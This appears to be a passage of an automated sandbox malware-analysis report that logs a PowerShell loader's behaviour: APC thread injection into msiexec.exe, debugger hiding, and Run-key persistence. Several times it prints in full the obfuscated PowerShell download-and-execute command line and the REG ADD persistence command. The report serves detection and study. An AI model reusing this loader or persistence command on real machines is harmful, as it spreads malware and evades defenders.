              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5923Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3890Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7443Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2295Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612Thread sleep time: -11990383647911201s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8172Thread sleep time: -6456360425798339s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 7312Thread sleep count: 1536 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\msiexec.exeThread sleep count: Count: 1536 delay: -5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C1D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2502020632.0000000006BC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000002.00000002.1463396941.0000021368D3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0468D434 LdrInitializeThunk,10_2_0468D434
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Early bird code injection technique detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_7304.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7304, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8052, type: MEMORYSTR
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4060000Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "echo $Enchodus;function Haggardly($Afhjlpningens){ .($Remittable) ($Afhjlpningens)} function Slappelse199($Refallen){$Tidsskriftssamlingens170=5;do{$Eight+=$Refallen[$Tidsskriftssamlingens170];$Tidsskriftssamlingens170+=6;$Nysgerrighederne=Format-List} until(!$Refallen[$Tidsskriftssamlingens170])$Eight}$Gildhall=Slappelse199 'theren coate OverTPudsi.flerdW';$Gildhall+=Slappelse199 'SygemeKarbob Kontc For lCopori EfteeArbejNFarest';$Horede=Slappelse199 'InforMDinaroNavnezGymnoiChinolae osl Foraa .kin/';$Gl=Slappelse199 'Me inTBjerglDe.ousI per1Inani2';$Belastedes=' Veks[Mon.snDiskoESpit,tPol,g.stenusUrinreNoncorOrd ivGrossIUtn ec AndeE mstP NedgOFunkti nekdnOut iTWitchmRigsga remiN SacrALamb g RensEBillirStivn] S,he:Dermo:.orbrsDecceE ukseC AfveUV nusRGeitjISeglet AmorYDialypSammeRDokumORudysTUnderoLysthcGui aOTo.dkLAnmrk=Omsme$UforsGCottaL';$Horede+=Slappelse199 ' C.pr5Calas.Tidta0Repas .nder(TermiWHaemoi UdkanG shidradero TranwDviguschart EnterNMath,TF rdo Kul.1Outpi0Feeds.salte0I dpr;S.ork AsylWOversiProduns,yat6 aadr4Under;k nst Guildx egrl6chivy4Rea e;gidse UndorSekvevHurtl:Datam1Nedgj3Pla o4Hexap.Pr du0Punkt)Sabel SnuppG,ttace SlutctnderkOmpr.oDambr/Dalze2Reneg0 Resk1 erio0Oldti0 hiro1Tasim0Domen1.epar scrapFDebowi Squar ZimmeSkubbfPreopoalexaxGalla/ apir1Autu 3Rumle4Safts.Un la0';$Taw=Slappelse199 'UntirUsemifsBe,deE Dekar Rntg-Gul.iATakeoG ncabe N.kvN Uddat';$Aktricens=Slappelse199 'ValerhGr ektOverftMbelppRigolsDyret:Quake/ Told/s.ingpAutoglKonj,aEventnSkvulaTruffcFiskehTerebi Hydre St kvCowpae Ro.krPosta.Do imaPooliu Oc t/G bioa OstedHemskmKamiki VarinJ.rds- Unshu,algss Overe.sperram,ia/PerioTF.gomeKrat lDen aeBajerfGaaseoBrugsn Sys.kMervrdabrete stearJe,as. Snk f Dis.l No.aa';$dipolen=Slappelse199 'Aliqu>';$Remittable=Slappelse199 'Enjoii uncoePomolX';$Sabirs='Ratsbanes';$Moos='\preconversion.Pri';Haggardly (Slappelse199 'Kasse$WarslGLsninLSa ssOSovepb l ndAImparLHuppe:UdfolpOve,ilBeskru BattmPolonBR.gefu,ostsm N,utS Just=Therm$Bat lE.nterndefunvAfske: I noASamk pSynkrpTre aDAuktiAOveriThumouaUndse+Exaes$ fdmpmP.mpeo winko reinS');Haggardly (Slappelse199 'sk fe$ ava gNonrelChab,oIndopBB.asfaformiLSvagh:Mutags ,owle ForsROligov g.ffI Mis.c De rERe onPShuntrSpindiNe raSGenhreP litR TegnNDovneED zinsUford=Dioxi$plainA,ormuk NovaTSkrueRMazi ISubstCBandoeBreddnNymphS tegn.BeboesHogfiPNovusLudaanIHonortPa ul(Unpro$ ,inudDartbICha,gP WingOYadeflBundlE Wo.lnDacry)');Haggardly (Slappelse199 $Belastedes);$Aktricens=$Serviceprisernes[0];$Nonmaritally=(Slappelse199 ' Besk$BoliggToi.elArmbaoSkralbB gloaHallolUnarb:S oftrSmagsE edstv Ru,eIQuartSEksisoToraeR RuteYSam.e= Tra,nAmir eUnderWPille-Hy,erORopanB Rmebj TuriEVacuuCEpit.Tpassa UsurSTundeYUnderScerebtGenerE,oncoMJocos.Resbo$TubicgKatacIBrevvLMarauDMotelhpuffeaCenteLSeriol');Haggardly ($Nonmaritally);Haggardly (Slappelse199 'Pir q$malloRAnomae priv yleniAlgr s FrucoSevilrOrganyK,nge.UnproHFreelePaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "echo $enchodus;function haggardly($afhjlpningens){ .($remittable) ($afhjlpningens)} function slappelse199($refallen){$tidsskriftssamlingens170=5;do{$eight+=$refallen[$tidsskriftssamlingens170];$tidsskriftssamlingens170+=6;$nysgerrighederne=format-list} until(!$refallen[$tidsskriftssamlingens170])$eight}$gildhall=slappelse199 'theren coate overtpudsi.flerdw';$gildhall+=slappelse199 'sygemekarbob kontc for lcopori efteearbejnfarest';$horede=slappelse199 'informdinaronavnezgymnoichinolae osl foraa .kin/';$gl=slappelse199 'me intbjerglde.ousi per1inani2';$belastedes=' veks[mon.sndiskoespit,tpol,g.stenusurinrenoncorord ivgrossiutn ec andee mstp nedgofunkti nekdnout itwitchmrigsga remin sacralamb g rensebillirstivn] s,he:dermo:.orbrsdeccee uksec afveuv nusrgeitjiseglet amorydialypsammerdokumorudystunderolysthcgui aoto.dklanmrk=omsme$uforsgcottal';$horede+=slappelse199 ' c.pr5calas.tidta0repas .nder(termiwhaemoi udkang shidradero tranwdviguschart enternmath,tf rdo kul.1outpi0feeds.salte0i dpr;s.ork asylwoversiproduns,yat6 aadr4under;k nst guildx egrl6chivy4rea e;gidse undorsekvevhurtl:datam1nedgj3pla o4hexap.pr du0punkt)sabel snuppg,ttace slutctnderkompr.odambr/dalze2reneg0 resk1 erio0oldti0 hiro1tasim0domen1.epar scrapfdebowi squar zimmeskubbfpreopoalexaxgalla/ apir1autu 3rumle4safts.un la0';$taw=slappelse199 'untirusemifsbe,dee dekar rntg-gul.iatakeog ncabe n.kvn uddat';$aktricens=slappelse199 'valerhgr ektoverftmbelpprigolsdyret:quake/ told/s.ingpautoglkonj,aeventnskvulatruffcfiskehterebi hydre st kvcowpae ro.krposta.do imapooliu oc t/g bioa ostedhemskmkamiki varinj.rds- unshu,algss overe.sperram,ia/periotf.gomekrat lden aebajerfgaaseobrugsn sys.kmervrdabrete stearje,as. snk f dis.l no.aa';$dipolen=slappelse199 'aliqu>';$remittable=slappelse199 'enjoii uncoepomolx';$sabirs='ratsbanes';$moos='\preconversion.pri';haggardly (slappelse199 'kasse$warslglsninlsa ssosovepb l ndaimparlhuppe:udfolpove,ilbeskru battmpolonbr.gefu,ostsm n,uts just=therm$bat le.nterndefunvafske: i noasamk psynkrptre adauktiaoverithumouaundse+exaes$ fdmpmp.mpeo winko reins');haggardly (slappelse199 'sk fe$ ava gnonrelchab,oindopbb.asfaformilsvagh:mutags ,owle forsroligov g.ffi mis.c de rere onpshuntrspindine rasgenhrep litr tegnndovneed zinsuford=dioxi$plaina,ormuk novatskruermazi isubstcbandoebreddnnymphs tegn.beboeshogfipnovusludaanihonortpa ul(unpro$ ,inuddartbicha,gp wingoyadeflbundle wo.lndacry)');haggardly (slappelse199 $belastedes);$aktricens=$serviceprisernes[0];$nonmaritally=(slappelse199 ' besk$boliggtoi.elarmbaoskralbb gloahallolunarb:s oftrsmagse edstv ru,eiquartseksisotoraer ruteysam.e= tra,namir eunderwpille-hy,eroropanb rmebj turievacuucepit.tpassa usurstundeyunderscerebtgenere,oncomjocos.resbo$tubicgkatacibrevvlmaraudmotelhpuffeacentelseriol');haggardly ($nonmaritally);haggardly (slappelse199 'pir q$malloranomae priv ylenialgr s frucosevilrorganyk,nge.unprohfreelepa
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "echo $enchodus;function haggardly($afhjlpningens){ .($remittable) ($afhjlpningens)} function slappelse199($refallen){$tidsskriftssamlingens170=5;do{$eight+=$refallen[$tidsskriftssamlingens170];$tidsskriftssamlingens170+=6;$nysgerrighederne=format-list} until(!$refallen[$tidsskriftssamlingens170])$eight}$gildhall=slappelse199 'theren coate overtpudsi.flerdw';$gildhall+=slappelse199 'sygemekarbob kontc for lcopori efteearbejnfarest';$horede=slappelse199 'informdinaronavnezgymnoichinolae osl foraa .kin/';$gl=slappelse199 'me intbjerglde.ousi per1inani2';$belastedes=' veks[mon.sndiskoespit,tpol,g.stenusurinrenoncorord ivgrossiutn ec andee mstp nedgofunkti nekdnout itwitchmrigsga remin sacralamb g rensebillirstivn] s,he:dermo:.orbrsdeccee uksec afveuv nusrgeitjiseglet amorydialypsammerdokumorudystunderolysthcgui aoto.dklanmrk=omsme$uforsgcottal';$horede+=slappelse199 ' c.pr5calas.tidta0repas .nder(termiwhaemoi udkang shidradero tranwdviguschart enternmath,tf rdo kul.1outpi0feeds.salte0i dpr;s.ork asylwoversiproduns,yat6 aadr4under;k nst guildx egrl6chivy4rea e;gidse undorsekvevhurtl:datam1nedgj3pla o4hexap.pr du0punkt)sabel snuppg,ttace slutctnderkompr.odambr/dalze2reneg0 resk1 erio0oldti0 hiro1tasim0domen1.epar scrapfdebowi squar zimmeskubbfpreopoalexaxgalla/ apir1autu 3rumle4safts.un la0';$taw=slappelse199 'untirusemifsbe,dee dekar rntg-gul.iatakeog ncabe n.kvn uddat';$aktricens=slappelse199 'valerhgr ektoverftmbelpprigolsdyret:quake/ told/s.ingpautoglkonj,aeventnskvulatruffcfiskehterebi hydre st kvcowpae ro.krposta.do imapooliu oc t/g bioa ostedhemskmkamiki varinj.rds- unshu,algss overe.sperram,ia/periotf.gomekrat lden aebajerfgaaseobrugsn sys.kmervrdabrete stearje,as. snk f dis.l no.aa';$dipolen=slappelse199 'aliqu>';$remittable=slappelse199 'enjoii uncoepomolx';$sabirs='ratsbanes';$moos='\preconversion.pri';haggardly (slappelse199 'kasse$warslglsninlsa ssosovepb l ndaimparlhuppe:udfolpove,ilbeskru battmpolonbr.gefu,ostsm n,uts just=therm$bat le.nterndefunvafske: i noasamk psynkrptre adauktiaoverithumouaundse+exaes$ fdmpmp.mpeo winko reins');haggardly (slappelse199 'sk fe$ ava gnonrelchab,oindopbb.asfaformilsvagh:mutags ,owle forsroligov g.ffi mis.c de rere onpshuntrspindine rasgenhrep litr tegnndovneed zinsuford=dioxi$plaina,ormuk novatskruermazi isubstcbandoebreddnnymphs tegn.beboeshogfipnovusludaanihonortpa ul(unpro$ ,inuddartbicha,gp wingoyadeflbundle wo.lndacry)');haggardly (slappelse199 $belastedes);$aktricens=$serviceprisernes[0];$nonmaritally=(slappelse199 ' besk$boliggtoi.elarmbaoskralbb gloahallolunarb:s oftrsmagse edstv ru,eiquartseksisotoraer ruteysam.e= tra,namir eunderwpille-hy,eroropanb rmebj turievacuucepit.tpassa usurstundeyunderscerebtgenere,oncomjocos.resbo$tubicgkatacibrevvlmaraudmotelhpuffeacentelseriol');haggardly ($nonmaritally);haggardly (slappelse199 'pir q$malloranomae priv ylenialgr s frucosevilror
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add "hkcu\software\microsoft\windows\currentversion\run" /f /v "afbenyt" /t reg_expand_sz /d "%pigling% -windowstyle 1 $kolumners112=(gi 'hkcu:\software\abanga62\').getvalue('metanetwork');%pigling% ($kolumners112)"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "echo $enchodus;function haggardly($afhjlpningens){ .($remittable) ($afhjlpningens)} function slappelse199($refallen){$tidsskriftssamlingens170=5;do{$eight+=$refallen[$tidsskriftssamlingens170];$tidsskriftssamlingens170+=6;$nysgerrighederne=format-list} until(!$refallen[$tidsskriftssamlingens170])$eight}$gildhall=slappelse199 'theren coate overtpudsi.flerdw';$gildhall+=slappelse199 'sygemekarbob kontc for lcopori efteearbejnfarest';$horede=slappelse199 'informdinaronavnezgymnoichinolae osl foraa .kin/';$gl=slappelse199 'me intbjerglde.ousi per1inani2';$belastedes=' veks[mon.sndiskoespit,tpol,g.stenusurinrenoncorord ivgrossiutn ec andee mstp nedgofunkti nekdnout itwitchmrigsga remin sacralamb g rensebillirstivn] s,he:dermo:.orbrsdeccee uksec afveuv nusrgeitjiseglet amorydialypsammerdokumorudystunderolysthcgui aoto.dklanmrk=omsme$uforsgcottal';$horede+=slappelse199 ' c.pr5calas.tidta0repas .nder(termiwhaemoi udkang shidradero tranwdviguschart enternmath,tf rdo kul.1outpi0feeds.salte0i dpr;s.ork asylwoversiproduns,yat6 aadr4under;k nst guildx egrl6chivy4rea e;gidse undorsekvevhurtl:datam1nedgj3pla o4hexap.pr du0punkt)sabel snuppg,ttace slutctnderkompr.odambr/dalze2reneg0 resk1 erio0oldti0 hiro1tasim0domen1.epar scrapfdebowi squar zimmeskubbfpreopoalexaxgalla/ apir1autu 3rumle4safts.un la0';$taw=slappelse199 'untirusemifsbe,dee dekar rntg-gul.iatakeog ncabe n.kvn uddat';$aktricens=slappelse199 'valerhgr ektoverftmbelpprigolsdyret:quake/ told/s.ingpautoglkonj,aeventnskvulatruffcfiskehterebi hydre st kvcowpae ro.krposta.do imapooliu oc t/g bioa ostedhemskmkamiki varinj.rds- unshu,algss overe.sperram,ia/periotf.gomekrat lden aebajerfgaaseobrugsn sys.kmervrdabrete stearje,as. snk f dis.l no.aa';$dipolen=slappelse199 'aliqu>';$remittable=slappelse199 'enjoii uncoepomolx';$sabirs='ratsbanes';$moos='\preconversion.pri';haggardly (slappelse199 'kasse$warslglsninlsa ssosovepb l ndaimparlhuppe:udfolpove,ilbeskru battmpolonbr.gefu,ostsm n,uts just=therm$bat le.nterndefunvafske: i noasamk psynkrptre adauktiaoverithumouaundse+exaes$ fdmpmp.mpeo winko reins');haggardly (slappelse199 'sk fe$ ava gnonrelchab,oindopbb.asfaformilsvagh:mutags ,owle forsroligov g.ffi mis.c de rere onpshuntrspindine rasgenhrep litr tegnndovneed zinsuford=dioxi$plaina,ormuk novatskruermazi isubstcbandoebreddnnymphs tegn.beboeshogfipnovusludaanihonortpa ul(unpro$ ,inuddartbicha,gp wingoyadeflbundle wo.lndacry)');haggardly (slappelse199 $belastedes);$aktricens=$serviceprisernes[0];$nonmaritally=(slappelse199 ' besk$boliggtoi.elarmbaoskralbb gloahallolunarb:s oftrsmagse edstv ru,eiquartseksisotoraer ruteysam.e= tra,namir eunderwpille-hy,eroropanb rmebj turievacuucepit.tpassa usurstundeyunderscerebtgenere,oncomjocos.resbo$tubicgkatacibrevvlmaraudmotelhpuffeacentelseriol');haggardly ($nonmaritally);haggardly (slappelse199 'pir q$malloranomae priv ylenialgr s frucosevilrorganyk,nge.unprohfreelepaJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add "hkcu\software\microsoft\windows\currentversion\run" /f /v "afbenyt" /t reg_expand_sz /d "%pigling% -windowstyle 1 $kolumners112=(gi 'hkcu:\software\abanga62\').getvalue('metanetwork');%pigling% ($kolumners112)"Jump to behavior
              Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmp, hsGaonspt.dat.14.drBinary or memory string: [2025/03/07 12:41:34 Program Manager]
              Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerblic
              Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerc
              Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerd
              Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managera
              Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerN=8f08
              Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
              Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager?
              Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager_
              Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager`
              Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C01000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2502020632.0000000006BC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager=
              Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managernown.
              Source: msiexec.exe, 0000000E.00000002.2514623930.000000002263C000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: g"Program Manager
              Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager|
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
